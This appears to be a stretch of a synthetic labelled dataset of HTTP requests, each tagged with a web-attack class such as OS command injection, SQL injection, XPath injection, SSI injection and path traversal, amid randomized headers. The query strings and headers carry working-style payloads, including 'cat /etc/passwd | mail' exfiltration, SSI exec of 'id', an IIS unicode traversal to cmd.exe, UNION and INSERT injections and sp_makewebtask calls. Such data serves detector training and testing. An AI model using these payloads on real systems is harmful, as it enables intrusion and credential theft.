Cookie: execWbF5W=4;e7meet=002503618;D5sK9=An0i;eu=i3HmQmU0Fstt;yie=xh ;cogtesthMalen=0820716
Cookie2: $Version="1"
Date: Tue, 16 Oct 07 09:30:51 GMT
Expect: 100-continue
If-Modified-Since: Tue, 08 Jun 04 10:15:16 GMT
If-Unmodified-Since: Sun, 04 Oct 09 11:19:01 UTC
If-Match: "DC0vdWRkRIA2BEBp"
If-None-Match: "N4jMZwqNgiTMlIPp"
If-Range: Mon, 05 Sep 05 04:03:44 UTC
Max-Forwards: 80
Pragma: no-cache
Proxy-Authorization: Basic bnRhV29yaXQ6c2Rhcg==
Authorization: NTLM cTQ3YU9lbmZ3emQ3YXdvaHRjcGVtU3N0dWthUnRkYmFwYWE4cG9xeWps
Range: -884,93-882862,81022-507
Referer: /nGiLt/oheLd/rrbncsl.js
TE: trailers,trailers
Trailer: Host
User-Agent: Mozilla/5.5 (compatible; esaooe0s; Linux i586; nusYeRo2t; Eiam)
UA-Disp: 5353,5285,32
UA-OS: FreeBSD
Via: HTTP/7.0 66.218.161.241:790, rOsd7/2.3 www.7eanje.js:632
Transfer-Encoding: compress
Upgrade: ldu4yj/2.7, bmeN/8.1, deh/2.9
Warning: 895 95.106.146.142 "tark01bhtisa" 
X-Forwarded-For: 176.191.17.103
----: -----------
~~~~~: ~~~~~~~~~~

null

End - Id: 45450
Start - Id: 43459
class: OsCommanding
GET /eWthgMH1Tjt/xgVformP9j0wJE0U/acVnBZE6Y2i/nQ2@P76Twyi7u0.Z/relTaaqhsldmnp1cu1.cgi?le5fdditd10ojz4=ryame&eencei5S=stdnysHrICep&c6eeel5Jter=%7C++++echo++%22+++Content-Type%3A+text%2Fhtml%22+++++%3B++echo+++++%22%22+++++%3B+++id%5C0&1aoA=iS+passwde&afb=8&ae3ra4h0fhueH=%299%25oe%3Anu&xgtmpreplace=a2t%3B&ltttolz=lLfm%409q&o6dKYivgT=3933054267&tfitOimureTye=92717 HTTP/1.1
Host: 205.195.160.16:80
Connection: a4et
Accept: */*;q=0.0
Accept-Charset: *
Accept-Encoding: *;q=0.0
Accept-Language: cEdopsu-lnt;q=0.2, a-Arn;q=0.7, ziaRhLi-wreis;q=0.9, eovu-teee1rue, E-tmaeo;q=0.0
Cache-Control: d='dE'
Client-ip: 21.205.240.147
Cookie: ore9ae=tbtnfdCCe107n;spwodnelspata=dihF..YRzN7
Cookie2: $Version="3"
Date: Fri, 03 Jun 05 02:33:53 UTC
ETag: "ovvj4GghfZC8siq34Gtg"
Expect: 8oyrtlas
From: t3bs@fsiaebtorf.it
If-Modified-Since: Fri, 11 Dec 09 13:35:43 UTC
If-Unmodified-Since: Fri, 03 Dec 04 20:40:27 CET
If-Range: Sat, 07 Apr 07 02:56:25 GMT
Max-Forwards: 39
MIME-Version: 2.3
Pragma: xt=sRlstd
Authorization: Digest realm
Referer: /kfneyIb/snpq/xeio.msf
TE: gzip;q=0.2
User-Agent: iu0Gn0if6sn
UA-Pixels: 828x8678
Via: HTTP/5.6 38.93.68.245:063, 4.4 www.nenTz.gif
Transfer-Encoding: compress
Upgrade: oix4/9.4, hl1rd/5.1, jsHtts/4.7
Warning: 518 181.124.206.103:336 "aaIai6i" "Thu, 24 Feb 05 13:04:27 UTC"

null

End - Id: 43459
Start - Id: 42414
class: SqlInjection
GET /esMrqosvfArnen/tniOoioahyssHhehu/mQ.DPra8AftoOQaE/lvigont6ruabo/jgSzd7JF/n3@kaTp6jXip12o/nv0/zp.zNTyrr/eV5hCsXxbMZFWac@J_Et/pcneiU/oi0idedrttene.nsf?eNiK.2TMrm_j=1&vwgr6aaiI=wd+accepttti0a+nteMn%28ju5o3&esdtitusfartgu3=ms%3Cs&ulNsmp=h3_&7ncTnsron9nenge=llQe6koi7i&ATpKUwinntX.v=erro&aEiath=%27++++%29+++++UNION++++ALL+++SELECT++9999+FROM++sa+++++WHERE+++%28++++%27%27+%3D%27&usccoe80taume4c=6na8e&3nErtboir3y4r=gn&rmochawherewinntg6body1zA2=2&JOweHomm=taelosi&5aecnxahf5avs=a+wcsnan HTTP/1.1
Host: 65.155.252.222
Connection: naali
Accept: */*;q=0.9
Accept-Charset: cp-950;q=0.9
Accept-Encoding: *;q=0.0
Accept-Language: e-ooindbas
Cache-Control: max-stale
Client-ip: 179.176.205.80
Cookie: erong47mhdareol=rhttMvtg5rPdwvltbd;e1AorkPuisa=895581;sonrnlodHse=iklmail7ifromt;-Ny5GdZsm=ioi7Ost;88=sTvoer
Cookie2: $Version="516"
Date: Mon, 04 Jun 07 08:43:48 CET
ETag: "r8I_iDY0uWEfoKfD"
Expect: 100-continue
From: Tm9x@je4xi.it
If-Modified-Since: Thu, 01 Apr 04 14:45:31 CET
If-Unmodified-Since: Sun, 29 Aug 04 03:43:16 GMT
If-Match: *
If-None-Match: "y9VxiDxue08q4.M8@hJ"
If-Range: Tue, 26 Jul 05 16:39:13 CET
Max-Forwards: 7
MIME-Version: 7.6
Pragma: no-cache
Proxy-Authorization: Basic YWV0ZWJwdzplbHdOZm1lcg==
Authorization: NTLM V2hvOXR0dG5uRmF3ZEVhbzllbTF0c1VrZXZpaGk2bklaOGVYVWl3ZW9jZlBk
Range: -975727,63980-89,80-3
Referer: /taehnsts/ve7msooa/tnnl/yoAitc/ref9.png
TE: trailers
Trailer: Host
User-Agent: idoVarp/9.1.6.4
UA-CPU: StrongARM
UA-Disp: 156,101,8
UA-OS: Linux
UA-Color: color8
UA-Pixels: 189x646
Via: 5.6 www.b2o1.htm, FTP/5.6 www.3ej7.html
Transfer-Encoding: compress
Upgrade: 3w4vo/5.2, oee9/2.0, ot6Q/5.5, ergojg/6.9, u2osoe/4.9
Warning: 132 103.251.31.233 "a5neo" "Tue, 16 Dec 08 15:42:51 UTC"
X-Forwarded-For: 120.46.59.231
X-Serial-Number: 2317427
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42414
Start - Id: 44504
class: OsCommanding
GET /scripts/..��../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: www.Xhdkee8ft.ch
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-15, euc-tw;q=0.3, x-mac-greek;q=0.1
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=5
Client-ip: 245.96.181.37
Cookie: laNufng=k;9gusrrj-.=eoqesnxary9f;utg=79;wfa4beV7B=rnio?olania
Cookie2: $Version="123"
Date: Fri, 20 Nov 09 22:21:22 GMT
ETag: W/"MYr9ZmTiyD.S_ICN2G"
Expect: sfshsaRs=urgyr;h087du=rtocyehe
From: ciaeri@estekqcd.uk
If-Modified-Since: Mon, 04 May 09 20:29:35 UTC
If-Unmodified-Since: Mon, 21 Feb 05 05:49:26 CET
If-Match: *
If-None-Match: *
If-Range: Fri, 26 Mar 10 07:19:07 UTC
Max-Forwards: 12
MIME-Version: 8.2
Pragma: wd=vaec
Proxy-Authorization: NTLM Z2VpdXJ0b2FubGVFNG95ZWhvZmVwckZkdDF0d2ltcW5kZGRobnRrT2hl
Authorization: NTLM RlBFdGF0dDRhYXd6dHYwdW9zZWVjcjdhbjhvbjRhemJuOHVrcWVlUmw=
Range: 02051-7,-37253,903-654
Referer: /iidhe/u5deKt/haoath.pdf
TE: gzip;q=0.6
Trailer: Via
User-Agent: o6cbtl1anvicetufderr
UA-CPU: Sparc
UA-Disp: 715,347,8
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 455x841
Via: usi/5.0 44.195.109.125
Transfer-Encoding: identity
Upgrade: e50et/1.4
Warning: 079 172.67.80.251:54 "7stpts" 
X-Forwarded-For: 106.107.95.22
X-Serial-Number: 80317009323381424111
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44504
Start - Id: 48868
class: XPathInjection
GET /dPXe5vhmQ6wxpr8ZNFgC/eOwNOiomxi_@m5x.exe?us0Swentdblte=8878&lp5rueei=wnvieiocss0fOAdoxt&s31uKd=9wr8hutcteitednni&eedIgeynObri=cmtn&heeIaan=3089397455&qt8v=otsErGpSiicria2ol&SSY9dtDu=+got+ti-i7nso%3Eilrmda&EjTa=yxng%27+++or+++++6+%3C+++count%28path%2Fchild%3A%3A*%29+++++or+++++%27mcroek%27%3D+++%27&M7-kzl@=mwt9tafeaesain HTTP/1.0
Host: www.omnai.fr
Connection: close
Accept: video/mpeg, audio/basic
Accept-Charset: windows-1250;q=0.6
Accept-Encoding: identity, identity;q=0.3
Accept-Language: rIQ-i1sEghlB, o-lAi, rs-rsYne, a-aeeaEse;q=0.1
Cache-Control: no-store
Client-ip: 81.197.139.145
Cookie: Felnsshb=gWUS1IMXXS;pgnwEa=veqch;wfss=97888;zrxLe=fezVi64
Cookie2: $Version="570"
Date: Fri, 26 Oct 07 13:33:38 GMT
ETag: "_fRV_D@7oKn-qsK"
Expect: dn6t
From: cSenj7od@i5ssuRhni.com
If-Modified-Since: Mon, 06 Nov 06 09:09:06 CET
If-Unmodified-Since: Sat, 19 Jun 04 15:43:15 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 3
MIME-Version: 4.5
Pragma: no-cache
Proxy-Authorization: Basic aHdmYTY6RXk3aw==
Authorization: NTLM cWViYm9OZWJaaHR3cm9hZW5yeXNBaGR1aEVFbnVlbm50aXQyYjNzcm5lYXRmcw==
Range: 692-,-672,-664068
Referer: http://www.toee.be/somo/Nsndrmr/ulleb/ednin8.msf
TE: trailers,trailers,gzip
Trailer: Referer
User-Agent: 6Tliii (l3iBXMG0-; eopn.Lb; tQXVsG)
UA-CPU: MIPS
UA-Disp: 184,1119,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 1420x8323
Via: HTTP/3.5 www.bgipl.css, 1.8 www.qIiie.gif:5476, 6.4 www.ctooTsls.css
Transfer-Encoding: compress
Upgrade: cntr/0.2, fRir/4.0, qalsS/7.9
Warning: 954 www.ilczoa.gif:1 "ja32a5uE" 
X-Forwarded-For: 156.103.50.172
X-Serial-Number: 043440
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48868
Start - Id: 41576
class: SqlInjection
GET /qV/aoa06t/Sxqwatcii05e7ion/nntervtmthzidtor/hyz1WIZoLMZLvOa/documentRyeT/bPuz6VL.php?8kiDg=2ntn&omlnle3vf5u=h7iux1RHCO&ihms=%27%3B+++++insert+into+qcies++++values%28666%2C%27er%27%2C%27eho9s%27%2C0xfffff%29 HTTP/1.1
Host: www.ectLo.st
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 237.68.176.239
Cookie: hStT5g=jY2J1;Oethrashnawo=i-nadminsswiframeeaallsnfk;tj3ucsdrleedd=erri;yu@LK2Zn.40G=3qC0V6n7js;systemZeY=n krntn;tbtea=d549@CUi4
Cookie2: $Version="8"
Date: Tue, 18 Nov 08 24:58:35 UTC
ETag: "BSZ0DEttcU_5_LcM"
Expect: 100-continue
From: xwfji@6eera.be
If-Modified-Since: Fri, 07 Mar 08 22:23:14 GMT
If-Unmodified-Since: Fri, 02 Oct 09 06:03:52 UTC
If-Match: "89qyYq7ag@mcdLk9Mw"
If-None-Match: "hWceBVZBcyHem7PY4"
If-Range: Wed, 30 Nov 05 03:35:24 GMT
Max-Forwards: 98
MIME-Version: 3.1
Pragma: 1fcgiy='riss'
Proxy-Authorization: NTLM b2xzb3NobDl0dG9mbWpvZTJmc2VmczJlZWhlZm10cWV0aHN1bGNvNmliZDg=
Authorization: ytkd2f r9ns9e=yODl
Range: 629953-,-3
Referer: /dyofs/qrmueeoa.tar
TE: trailers,trailers,trailers
Trailer: If-Range
User-Agent: rsrSe (sjND_X; sRmZ2q6; elYFYb_s; uahs0ql; uXb152SRy9)
UA-CPU: StrongARM
UA-Disp: 989,4955,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 1852x515
Via: 2.8 116.214.112.149, 1.1 102.182.25.191:36362, 8.1 www.rIlb.jpeg
Transfer-Encoding: deflate
Upgrade: Epoll/4.7, sesde/6.4, Uar/2.7, i4she/5.4, mukl/7.2
Warning: 480 www.mfahnai.css "oldac4" "Mon, 15 Jun 09 01:00:23 UTC"
X-Forwarded-For: 166.15.230.232
X-Serial-Number: 27867012215439
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41576
Start - Id: 41164
class: SqlInjection
POST /egDe1Ql8qe0i/nfTcUTkq/zexecn4Yzx0lP33HR/3dk6C0/er_ADwS/muxmpFu.KULTpk_/l9eontcy5.tiff? HTTP/1.1
Content-Length: 251
Content-Language: eli
Content-Encoding: gzip
Content-MD5: ZmM4bnB1UnRpbWVBeWV3cw==
Content-Type: application/x-www-form-urlencoded
Last-Modified: Thu, 22 Apr 04 07:12:23 UTC
Host: 207.92.195.170
Connection: aveo
Accept: audio/basic;q=0.8, image/*;q=0.5, audio/*;q=0.4
Accept-Charset: *;q=0.7
Accept-Language: ';     EXEC   master.dbo.sp_makewebtask 'c:\inetpub\wwwroot\aoum2rtb.jpeg',  'SELECT    hRosa     FROM  lfex     WHERE     xtype=''U'''
Cache-Control: min-fresh=1
Cookie: nszRthiio=173;zB54w=lxb204fxT;afewoftatre4rtl=i(rzxtT%77sf;aesu=turthfyahwaeUb;iaamd9ctopxama9=18445204
Cookie2: $Version="68"
Date: Wed, 14 Jul 04 24:14:49 CET
If-Modified-Since: Wed, 01 Dec 04 10:02:03 UTC
If-Unmodified-Since: Mon, 28 Feb 05 11:54:06 UTC
If-Match: *
If-None-Match: "z7slVXE4ydbLsZnlf_"
Max-Forwards: 2341
Pragma: no-cache
Referer: /sqen/Onpt.tiff
TE: trailers,chunked;q=0.8
User-Agent: gAaf/1.3.1
UA-Pixels: 2262x8961
Transfer-Encoding: deflate

t51a=316766&wfotli1=Mphp45exec0 iot1eevbscripteoteh&@DQ-mDU=eNQ&ormtpwrs=857911&cwN=binsuheaanl&dNaRg=4&GQmetaB=toLyj_xdCg&am9AnoMt85Onu7t=Eyiehdrcpaescriptfb3eE&iehknemorie=oen8mfoavEysiaoeaO&oewexnLt=97648985&xEpfweeelit=thi0rwgetehew>zb6j&eo=9837

End - Id: 41164
Start - Id: 40190
class: SSI
GET /lkMJ3U0EveycxCzDaq/st/edsnsci26e/XHc-Alib/ztgrb/tociiig6BTat1aen.jpeg?slleti4a5Tdoo=6269&Ms=%3C%21+%23%3C%21--++%23exec++++cmd%3D%22id%22--%3E HTTP/1.0
Host: www.ryoqyE3uf.ch
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: windows-1257, windows-874, x-mac-korean
Accept-Encoding: compress;q=0.4, deflate, compress;q=0.8, gzip
Accept-Language: ws-9nt;q=0.4
Cache-Control: max-age=2494
Client-ip: 95.143.38.157
Cookie: zy1OOAdhsp=erw
Cookie2: $Version="6"
Date: Sun, 01 Apr 07 06:06:27 UTC
ETag: W/"IY2@3WKoRmkzER6"
Expect: 100-continue
From: beevy@rdaeiuersl.de
If-Modified-Since: Wed, 19 Sep 07 06:30:23 UTC
If-Unmodified-Since: Mon, 06 Oct 08 05:15:08 CET
If-Match: "fFjwbtBjLsoGDrh-NV9s"
If-None-Match: *
If-Range: Sat, 10 Oct 09 21:12:58 CET
Max-Forwards: 0299
Pragma: 9=etnsrlo
Proxy-Authorization: Digest nonce
Authorization: 2u2t3r inrj7S=9Eos8k
Range: 95170-36663
Referer: http://www.lgwhln3.biz/reor/hfj9tU/sea3.css
TE: gzip;q=0.2,trailers,trailers
Trailer: Transfer-Encoding
User-Agent: rHWfnywcR http://www.sln5hofu.it
UA-CPU: 68000
UA-Disp: 134,343,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 9646x716
Via: 0.8 52.94.88.247
Transfer-Encoding: identity
Upgrade: aiaEi/3.2, nenl/7.3
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40190
Start - Id: 43161
class: OsCommanding
GET /inu6Y0Qvbscript6uusrGf/DwtP3XYchildX/njM2gVO0LtZ_vcG2F/scjesetKrmn/o5J/nW6jS2jj.htm?MiMQG=%250a+cat++%250a++%2Fetc%2Fpasswd++%250a HTTP/1.0
Host: www.yunHsnyow.net
Connection: close
Accept: */*
Accept-Charset: x-mac-icelandic, windows-1257;q=0.4, iso-8859-4;q=0.3, x-mac-arabic
Accept-Encoding: 
Accept-Language: len-7e2fr, be9oaati-hrj;q=0.3
Cache-Control: no-cache
Client-ip: 147.97.110.132
Cookie: .BYmAKJ82ODt=&l;placfmufcwe=n
Cookie2: $Version="36"
Date: Fri, 26 Jun 09 24:48:30 GMT
ETag: W/"Wm-uQG@VhFKtK.gNS7"
Expect: ucdhrA
From: Thwz@uroeopi4.net
If-Modified-Since: Tue, 04 Jan 05 16:24:55 UTC
If-Unmodified-Since: Sun, 07 Aug 05 17:08:26 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 77
MIME-Version: 9.5
Pragma: ea=ep0R
Proxy-Authorization: Basic OWFyMXVlZDo2cnBobg==
Authorization: Digest realm
Range: -1
Referer: http://www.pefcd4.net/fdRnaeer/a2ant6ra/alfsTBdr/hrtznxri.php3
TE: chunked;q=0.8
Trailer: If-Match
User-Agent: Mozilla/0.7 (Machintosh; U; PPC 7.7; t1-er; rv:2.4.5) Gecko/76490022
UA-CPU: Sparc
UA-Disp: 309,0830,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 807x674
Via: 3.3 www.ijt39.css:6180
Transfer-Encoding: gzip
Upgrade: sPlrA/2.7, nth/6.0, S4hn/1.6, eStqn/4.6, aarg/7.7
Warning: 027 www.snsA.shtml "dncghr1daAmsfa" 
X-Forwarded-For: 179.224.81.249
X-Serial-Number: 97812200258960530552
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43161
Start - Id: 43243
class: OsCommanding
GET /et/wLn6kx49eJvP/unTxDK6Diku/8p5slaOekmS4eLte/3SlaX2MN/t_x/S8retcehT9Q1kcsu6ro/tticoKwlnohwnes/1wJAeR3.jpg?3iIxsgj=ie1n5man2n9v&tztnN=3087015994&2@Jb7Sbj=d2t58dfh&ianttem3uabl=ee%2Bnio&tx5a=9y&bnenumrjnsitscE=ulteAorn5qsatE&acTs=e9psUgK_wE2&xp_passwdfnbmOW=o&ry=566621&EsltieTq=ex&uerwis=ptpagtrLhTqhtTdlo&graarkAAe7Snntf=oops%3B+++++cat++++%2Fetc%2Fpasswd++%7C+++++mail+++++your%40at.com&ihtaTafrteno=61638936&a2aklorol=txnacceptV+tp HTTP/1.0
Host: www.7hr0.cz
Connection: 6etnjdsT
Accept: */*
Accept-Charset: euc-kr;q=0.3, iso-8859-1;q=0.5, isiri-3342;q=0.2, windows-874
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=24
Client-ip: 92.41.242.45
Cookie: adminNDxQZLpZeD=tS6_6If;8ehnlt2re=hVhGtJsBvv;aTmdteS7m=e+ea9g4@includeSa
Cookie2: $Version="8"
Date: Wed, 03 Dec 08 10:06:01 GMT
ETag: "C3D.70knu_pQ_crGa"
Expect: 100-continue
From: w5itei@2re1ofAi.st
If-Modified-Since: Thu, 02 Aug 07 16:28:04 GMT
If-Unmodified-Since: Fri, 21 Dec 07 07:05:06 GMT
If-Match: *
If-None-Match: "KNpOLxGzqwDX@7YWDblS"
If-Range: "89KxU-9PCmJwFsBC1z4"
Max-Forwards: 04
MIME-Version: 6.4
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: Basic bmlyb3BqOml5b3M=
Range: 6235-,3-
Referer: /rog358/8gyta.tiff
TE: trailers,chunked;q=0.6,trailers
Trailer: If-None-Match
User-Agent: cuidiepkus/9.0.1.4
UA-CPU: 68000
UA-Disp: 9170,0027,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 115x099
Via: HTTP/7.0 84.67.21.236, HTTP/2.7 www.rOhnact.png:5
Transfer-Encoding: deflate
Upgrade: nedg/4.6, yodj/9.6
Warning: 865 www.tCxceo.shtml "dydtrSr7Wtth" "Fri, 09 Jul 04 12:15:54 GMT"
X-Forwarded-For: 136.143.222.59
X-Serial-Number: 855673274232810386
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43243
Start - Id: 43357
class: OsCommanding
GET /eI1He6c3Ea1Ku7rW5ZCV/net4ng/fgcD4Y0QI6K8qjzMBmsS/ihg/yAUCsQQJ0Zv8aoh5Xs/eRdklDeQJZ-LI2C/P7accept4bXReOU/4r@9pi4AxbO/8r.cgi?5naos1nm=1341&LM=t3PVs67URMe&bcmna=302815&t9r=694951&dsedju=oops++++%3B+++++cat++%2Fetc%2Fpasswd+++++%7C++mail+your%40th.com&RuIgaltogteHsD=o%3Aeatthe%3Enmnetcatevardvbscript+Zo&oawPn=zoueus&vuhieunqe8ul=2%25j+%3Bksdiv3as%267ishcMb&lfrtvstamtgtri=msanla&2rnhw8ar78eni0=a&updateruaxtermR=sDq&_9eUTHg=aI3%40p&ghar=exectm+Klnao HTTP/1.1
Host: www.dmhnw.it
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: *
Accept-Encoding: deflate, deflate, deflate;q=0.1
Accept-Language: 0e92nnh-ira9s;q=0.6, fcuonhah-niulaXh;q=0.5
Cache-Control: no-transform
Client-ip: 156.10.128.233
Cookie: documentGSUcdd16cue=4g6$copyl;osntaas=zge;zLlNnteneiovro=tiaert;oGKG@=$ne;rfhdgct=i;Olqocfe9mt=3hqnn
Cookie2: $Version="34"
Date: Sun, 16 May 04 18:57:14 UTC
ETag: W/"ohJq6m3@_FAs86ugP"
Expect: seetl=mqbf
From: vpsly@coiheDy.uk
If-Modified-Since: Thu, 22 Mar 07 23:07:04 GMT
If-Unmodified-Since: Fri, 25 May 07 23:20:49 GMT
If-Match: *
If-None-Match: *
If-Range: Wed, 27 Jan 10 17:44:00 GMT
Max-Forwards: 701
MIME-Version: 3.8
Pragma: no-cache
Proxy-Authorization: Digest opaque="faby1"
Authorization: Basic YWVvbXNvYXc6c3RmZWlj
Range: -44,21391-
Referer: http://1rds5.net/wc4mle/uiii/epzmxhu.txt
TE: trailers
Trailer: If-Range
User-Agent: DwwrpaiIhjeteem
UA-CPU: 68000
UA-Disp: 106,481,16
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 331x628
Via: Rstm3/2.2 www.abiyoqk.png
Transfer-Encoding: identity
Upgrade: gso/5.0, rNa5/4.2, pdodni/6.9, hdrrTE/2.2
Warning: 363 www.igd5n.css "nqcasc4" "Sun, 08 Jun 08 05:03:15 CET"
X-Forwarded-For: 246.239.174.69
X-Serial-Number: 3255845056436088473
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43357
Start - Id: 45275
class: PathTransversal
GET /d_Vk9tbS/ovc08ck6csAd4C/hGPYwf5f1TpewKZEr/ev1SsXOjanbb5FnQo/Ods6gn8/ec/sm.AlKqk8fw21LogUp./.YnEK/nWGVYaWYSwlRtVK/ynxamrncnslu.asp?mni=ht&na=Ee5FNhhlom3&eerAi=kdl4eRuaa7e&Srtabdhl4=aAi3rryM%27nzriconnectleu&r2aatieef=uh+re5aihene&cmmiy=889&eu=tVNIMvP&sErop9anEat=%5Be&tti=388&c8oo6nez7tlkOeY=qc8k&mtihhrtqpltla=n9mzeh&naTSe=y+alasalri&izdaaFIhTw=adso4n%3A+oethi%3A&xdxOUs_HK=tRsxhDErrsurW7A7q&doG4s=69 HTTP/1.0
Host: www.tbau.biz:03490
Connection: xomthrol
Accept: */*;q=0.5
Accept-Charset: iso-8859-6, gb2312;q=0.7, x-mac-roman;q=0.6, iso-8859-6
Accept-Encoding: I:\winnt\boot.ini
Accept-Language: *;q=0.5
Cache-Control: no-store
Client-ip: 38.32.153.246
Cookie: eYsRssnmIos=eVJZP
Cookie2: $Version="97"
Date: Sun, 28 Sep 08 15:20:37 GMT
ETag: W/"5gSeKfsmgTjNx@2z-Qa"
Expect: 100-continue
From: ra7rtweh@ttrsy.org
If-Modified-Since: Thu, 28 Jan 10 08:18:12 UTC
If-Unmodified-Since: Sun, 13 Nov 05 01:13:27 CET
If-Match: *
If-None-Match: *
If-Range: Thu, 09 Sep 04 17:20:51 CET
Max-Forwards: 9
MIME-Version: 1.6
Pragma: no-cache
Proxy-Authorization: Basic enRvTzphaXFu
Authorization: inaeD5 dsrobor4=hcsda
Range: 259-814,-6312
Referer: http://www.NnN8.cz/4EbTa2/ryiame/6cit5yD/eHptsln/Gdu4Oin.css
TE: deflate;q=0.9,trailers
Trailer: Host
User-Agent: Betn (7DCYIoe; 1_NirMUL@h; p47dT-gse)
UA-CPU: 68000
UA-Disp: 4571,953,16
UA-Pixels: 0624x6647
Via: mrc0g/7.9 114.119.0.234
Transfer-Encoding: ebhIt3; siDelcnc=oXot
Upgrade: hau3E/8.8, 3q3eqe/2.3, eaxe4/7.9
Warning: 494 255.48.101.36:36380 "e28hr" 
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45275
Start - Id: 40666
class: SSI
GET /37DKJJ/dLBo/fceynipptee2k5imbl/I66CN9MR0inY/wz_oI8v0xp_C@07Kx/ih/nqHa4JvIzDyFLP/9qn/@5VojL72o/k_/SoptqcIn/ci@ZfbgsoundwXLfn.mdb?EtcsaGTc=5780&toal=1&Pp2n=e+6sinltincludeosrI&x6Vw=odyswohkfbaeoHoR&Ro6Aoedhsp0t=1061657760&Aay@CYA1=%3C%21--+++%23include+++++virtual%3D%22c%3A%5Cwinnt%5Csystem.ini%22++++--%3E HTTP/1.1
Host: 200.0.10.242
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 164.125.136.123
Cookie: nocmsIas2rn=912324
Cookie2: $Version="497"
Date: Sat, 24 Jan 09 03:00:39 GMT
ETag: W/"Q6J6OIeUtDDNbaVKZeC"
Expect: 100-continue
From: 4dtnvda@6tnlilE.st
If-Modified-Since: Fri, 16 Apr 04 05:57:16 GMT
If-Unmodified-Since: Tue, 06 Nov 07 04:34:22 GMT
If-Match: "kfdn1RX75_0zJqGC94"
If-None-Match: *
If-Range: Tue, 24 Feb 09 12:31:43 CET
Max-Forwards: 0221
MIME-Version: 9.9
Pragma: sl=nG
Authorization: nba2rv etid=nemRwh
Referer: http://www.tseul.biz/onltm/oadvqld1.jpeg
TE: trailers,deflate,trailers
Trailer: If-Match
User-Agent: sWr.1b0Bf http://www.ohoai.com
UA-CPU: MIPS
UA-Disp: 7385,808,16
UA-OS: Windows 98
UA-Color: color32
Via: trrEt/9.2 www.adancn.jpg
Transfer-Encoding: olnood
Upgrade: Ieaz1d/7.8, tans1/5.7, lea1/1.7, 8viely/9.9, eeton/2.9
X-Forwarded-For: 151.45.186.240
X-Serial-Number: 9147662078106
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40666
Start - Id: 40138
class: SSI
GET /b9/e2/ithNenaa/1window.open3zbcmdWposition/oA6lejblhza/rq11Hhjw0mos/7BV28/adrhzpdref8eg4rrcrii/efocbmn1nisst.jpg?Kyjboot.ini@EGpgJ6E=mXo++&lSI_allhaR49z=mFApNOos_&lfJinutsh=983&45WH=60%25+&aa3notnmt4rnrq=E9eenwataiaql&y4Xnq@=%3C%21+++++%23%3C%21--+++++%23exec+cmd%3D%22id%22--%3E&efacdcjssln=ty2R HTTP/1.0
Host: www.5Hsneesa5.net
Connection: iat5
Accept: */*;q=0.8
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: no-cache
Client-ip: 246.182.239.2
Cookie: tWr1hnnaoit=tHW5j
Cookie2: $Version="8"
Date: Sat, 17 Sep 05 19:57:26 CET
ETag: W/"DCOhlC2QHZ8Da-F2_"
Expect: 100-continue
From: hthq3df@t0rsnSoda.org
If-Modified-Since: Fri, 17 Dec 04 11:32:53 UTC
If-Unmodified-Since: Fri, 07 Nov 08 01:00:45 UTC
If-Match: *
If-None-Match: *
If-Range: "mm@ggSt23lVZv6kDQ_"
Max-Forwards: 3
MIME-Version: 8.1
Pragma: vk=ioaa
Proxy-Authorization: iici 6rR5nn=rdoeN9um
Authorization: dccce tifwhr=estwg
Range: 01-76865,-324119,86535-
Referer: /hsrtir9/gsos/rteapfee.gif
TE: chunked;q=0.7,chunked;q=0.4,trailers
Trailer: Pragma
User-Agent: Mozilla/7.8 (Windows; U; WinNT 4.8; 4s-dh; rv:1.5.7) Gecko/18782216
UA-Disp: 5908,939,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 844x123
Transfer-Encoding: identity
Warning: 318 191.70.190.146 "iieDaosahs2o" 
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 40138
Start - Id: 49755
class: XPathInjection
